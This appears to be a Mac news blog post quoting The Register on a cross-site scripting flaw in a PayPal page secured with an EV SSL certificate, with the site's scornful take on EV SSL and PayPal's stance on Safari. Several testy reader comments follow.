And they wanted to block Safari: PayPal’s EV SSL page and its vaunted green URL vulnerable to attack

“A serious scripting error has been discovered on PayPal that could enable attackers to create convincing spoof pages that steal users’ authentication credentials,” Dan Goodin reports for The Register.

“The cross-site scripting bug is made all the more critical because it resides on a page that uses an extended validation secure sockets layer certificate. The new-fangled SSL mechanism is designed to give users a higher degree of confidence that the page they’re visiting is secure by turning their browser address bar green,” Goodin reports.

“But Finnish researcher Harry Sintonen figured out a way to inject his own code into a supposedly protected PayPal page even as the green bar lulled visitors into believing it hadn’t been tampered with,” Goodin reports.

“The discovery is one more reason to remain skeptical of extended validation SSL, which has always struck us as a solution in search of a problem. Yes, we know it’s supposed to close a loophole that’s long existed in SSL by certifying, in this case for example, that it is eBay (the parent company of PayPal) that owns the SSL certificate for the specific PayPal page. But we’ve not yet heard of a single attack involving a forged certificate, so we’re tempted to think the measure is more gimmick designed to generate revenue for VeriSign and its competitors than anything else,” Goodin reports.

“eBay security pros seem to have drunk the EV SSL Kool Aid, however, having announced recently that browsers that don’t support the new standard [includes Apple’s Safari for Mac and WIndows] aren’t welcome on the PayPal site,” Goodin reports.

Full article here.


Here’s what we wrote a month ago, in part: “Should Apple add EV SSL to Safari? Maybe, maybe not; regardless it’s really no substitute for users’ common sense. What’s next, anyway, XL SSL? XXL? SuperSized? Puleeze… PayPal is not your mommy, users need to be responsible for themselves, and EV certificates are a scam designed to extract more money from website operators under the guise of more security.”


  1. Be NICE, guys and gals … they are trying to do the right thing(s). It didn’t work out, but the motivation showed their heart was in the right place. Unlike MS, where the question is is their heart a) black or b) missing?

    Sure, we can laugh at them, but … is there really any way to be 100% sure your web interaction is safe and secure? I don’t think so. You do your best and pray.

  2. Rather than chasing after a new revenue stream, why don’t these folks concentrate on actually making SSL more secure, so this kind of thing can’t happen?

    The fact that PayPal seemed so convinced that EVil SSL was more secure than it really is, has me concerned about where exactly their focus is: securing users’ data, or making more money for the folks behind EVil SSL?

  3. @ DLMeyer:

    Indeed. I want to be here when the Mac – yes, WHEN – gets an exploit that hoses people.
    You think any OS/platform is perfect?
    If you do, you better be prepared for the 9/11 that will someday hit your smartasses.

    We’ve been lucky.
    It won’t last forever.
    Will you be so smug then?

    “Dumbasses” is right – MDN and some of it’s visitors

  4. PayPal is not your mommy, users need to be responsible for themselves

    Fair enough. So how do you know if you’re being spoofed (by a good spoofer, that is)? Not all of us have/use packet sniffers. ” width=”19″ height=”19″ alt=”raspberry” style=”border:0;” />

    Where there’s money, there’s crime. Perhaps high-value targets like PayPal should consider dedicated client software, versus browser access? (Nothing against Safari, this has to do with SSL)

  5. PayPal never said they wanted to block Safari you silly silly fools. MDN Get your facts straight before you post any more bile.

    At least think before you make any comments. The 20 minute page load times on this site should give you plenty of opportunity to do that.

    MDN the Dvorak of the Mac newsites.

Reader Feedback

This site uses Akismet to reduce spam. Learn how your comment data is processed.